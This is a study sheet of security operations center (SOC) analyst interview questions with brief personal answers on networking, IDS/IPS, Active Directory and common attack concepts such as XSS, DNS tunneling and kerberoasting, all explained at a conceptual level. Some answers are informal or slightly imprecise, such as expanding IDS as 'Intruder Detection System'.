SOC Interview Questions
If you're looking at the SIEM and see a single IP hit multiple end points, what would that suggest?
This would seem to suggest some sort of reconnaissance done from that IP like a port scan.
What is a 0 day?
An exploit or vulnerability not made public to vendors. Often discovered and kept secret as a tool.
What happens when you access google.com?
1 - Assuming that the IP address of google.com is not cached already (such as in the browser or on the hosts file) the browser will send a request to the DNS server for the IP 2- Next step is to initiate a TCP connection over port 443 for HTTPs using the 3-way handshake 3 - Browser will send http request with a GET header 4 - Google's servers will respond 5 - Browser will load HTML, showing webpage
What port is telnet and why shouldn't it be used?
23, it allows a user to remote into a host but offers no secure protocols which makes it susceptible to eavesdropping attacks
What is Active Directory?
Active Directory provides a centralised control for network administration and security. Server computers configured with Active Directory are known as domain controllers. Active Directory stores all information and settings for a deployment in a central database, and allows administrators to assign policies and deploy and update software.
How does antivirus software recognize new viruses and worms?
By either using known virus signatures or by using heuristic based detection
Compress or encrypt first?
Compress than encrypt - less information to encrypt = less intensive use of resources
What's XSS attack?
Cross-site scripting attack is when an attacker injects code like javascript to impact other users who access the same page. ex. SAMY virus took down Myspace
Which is more secure open source or closed source?
Definitely depends on the context and who is actually working on the product. I think software that is actively maintained would be the most secure option
What is DNS? DNS Tunneling?
Domain Name System effectively acts as a phonebook of the internet by translating url address to IP addresses for routers to connect DNS tunneling takes advantage of the fact that DNS queries/responses on port 53 are very common and are used to bring either malicious files in or exfiltrate data w/o detection
What is the primary goal of cybersecurity / informational security?
Ensure that the company is successful in what it does and definitely not to set up roadblock to impede process. Infosec is about understanding and mitigating risk a company faces.
How do you stay up-to-date with cybersecurity news?
Follow specific subreddits, some handles on twitter, enjoy Darknet Diaries podcast and attend live stream study groups on yt.
What is HTTP?
Hypertext Transfer Protocol - used to communicate between hosts and servers. 2 common methods - Post, sends data to server to update/create a resource and Get, request data from server Port 80, and port 443 for HTTPs
What's the difference between an IDS and IPS?
IDS or Intruder Detection System - only detects does not prevent. IPS or Intruder Prevention System - detects and automatically prevents malicious traffic Pros/cons - IPS prevents but can be more difficult to tune and also can hamper threat hunting activities - intruder knows that they are detected
Why are preventative controls better than detective controls?
IPS vs IDS P requires more tuning and can accidentally restrict false positives, but prevents attacks from happening D requires more eyes and effort and can be prone to human error, but can allow one to monitor a threat actor
Steps to prevent data loss?
Increase availability of data by planning for 1) redundant resources that reduce the SPOF - in this scenario having backups that are stored safely or using RAID to survive harddrive failures and 2) using a business continuity plan to have policies in place (people in charge, testing of backups)
What's the difference between TCP and UDP?
TCP or Transmission Control Protocol is a connection focused protocol that uses the 3-way handshake to establish a connection before sending data. ex. UDP or User datagram protocol just sends packets without a connection first. ex. Streaming or online video game
What are the steps you would take to secure a server?
Operational: Training staff, use the concept of least privilege to ensure that nobody has unnecessary access, strong pw policy contingency planning Technical: physical controls like mantrap, firewalls, IPS, IDS, SIEM for log detection and monitoring
If you see multiple IP's hit a single endpoint, what would that suggest is happening?
Possible DDoS attack such as ping or SYN flood, of course it depends on context and what is considered to be baseline
Describe AAA
Protocols that provide authentication, authorization, and accounting, ex - RADIUS
What is the OSI model?
Provides a standardized method for understanding how applications communicate over the network. Is often used to troubleshoot issues - for example Layer 1 would be cables
Explain in your words, what is a data leak?
Sensitive, proprietary or private information is accessed by those who do not have the proper authorization (malicious insider or outsider)
What is the purpose of subnetting and why is it used?
Similar to a VLAN (which is on OSI Layer 2 vs Layer 3), it partitions networks to be more efficient and to reduce the amount of routers a host has to connect before accessing the internet. Also possible to segment network to provide special access to resources to those that are authorized.
What is kerberoasting?
Used by attackers once they have already intruded the enterprise network for privilege escalation and lateral movement. Attacker requests a service ticket and captures that ticket granting service ticket from memory and then proceeds to crack credential hash using password cracking tools such as John the Ripper. Best mitigation is to use long, complicated passwords for service accounts
What is a vulnerability? Threat? Risk
Vuln = weakness in anything, software, hardware, people Threat = any potential actor or danger that takes advantage of a vuln Risk = calculation of likelihood and impact of a threat using a vulnerability Talk about difficulty of quantifying cost of cyber risks so it's difficult for stakeholders to have buy in.
Have you had any experience in debugging?
Yup, talk about Proxmox VMs, but essentially I would take a systematic approach like using the OSI model or comparing normal function vs function after a change. Also, I would write notes about what I've tried, different resources and what worked.
Basic Linux Commands?
cd - change directory, ls - list files, mkdir - make directory, chmod - change permissions, grep - search files for regular expression